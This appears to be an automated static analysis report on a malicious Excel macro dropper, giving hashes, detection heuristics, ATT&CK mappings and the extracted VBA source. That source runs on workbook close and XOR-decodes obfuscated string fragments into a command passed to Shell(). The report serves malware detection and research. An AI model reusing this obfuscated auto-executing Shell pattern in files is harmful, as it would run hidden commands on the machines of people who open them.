Xls.Dropper.Agent-7401228-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 25ed1b11010361b5…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 40.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: a99745baf2b193b2be6db0628b77b518
SHA-1: 31d95dfe4aab93fac5164a85143d1801276dbeb8
SHA-256: 25ed1b11010361b5c6b198f72b88bcf293418552f976cd1c040e51cea61905b1
Risk score: 140

Malware Insights

Xls.Dropper.Agent-7401228-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The critical heuristic OLE_VBA_SHELL indicates that the VBA macros in this Excel file attempt to execute a command. In the extracted source, the Workbook_BeforeClose handler assigns the string 'calc' to a variable and passes it to the Shell() function, and the heart() routine XOR-decodes five obfuscated string fragments with per-fragment keys, concatenates them and passes the result to Shell() as well, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics (3)

  • ClamAV: Xls.Dropper.Agent-7401228-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7401228-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    | Kind      | Source                                                  | Size
macros.bas  | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 2054 bytes
SHA-256: ba189e7eb90f83d0ef92e2383580b33322a3d8c72f9e3d0ac283a539e2fe77b7

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub maybe()
heart

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
maybe



Var = "calc"
Shell (Var)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Sub heart()
LL1 = fMf5j80uf("   B v ;F PX  x", "qjw6eVxO2")

LL2 = fMf5j80uf("; c", "VeLqiZ8wF")

LL3 = fMf5j80uf(" $   ", "iWnqclUVA")

LL4 = fMf5j80uf("  >#U1 6   %?U, ", "rvDZ9DkWo")

LL5 = fMf5j80uf("& Y ! >", "Kz6eOwMRf")

LL = LL1 + LL2 + LL3 + LL4 + LL5

Shell (LL)

End Sub
Public Function YDyzxCnuBRs()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"

End Function
Public Function lNhMkCOCAuMJgPbgdoFG()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"
Dim rUkQQqyoTOPNSDwDi As Long
rUkQQqyoTOPNSDwDi = "8898"

End Function


Public Function fMf5j80uf(ByVal tYKgX4jdl As String, ByVal I50RspIZC As String) As String

Dim a2xCMwg4M As Long

    For a2xCMwg4M = 1 To Len(tYKgX4jdl)

        fMf5j80uf = fMf5j80uf & Chr(Asc(Mid(I50RspIZC, IIf(a2xCMwg4M Mod Len(I50RspIZC) <> 0, a2xCMwg4M Mod Len(I50RspIZC), Len(I50RspIZC)), 1)) Xor Asc(Mid(tYKgX4jdl, a2xCMwg4M, 1)))

    Next a2xCMwg4M

End Function
Private Function phGjNytiCtkx()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"

End Function
Private Function ByUrPURdgvQblgJZsLfaOuDECHslsQ()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"
If "FxQmeOwySvAOZtGu" = "HedEmDquTuFROlHgYTgwLhUeBw" Then End

End Function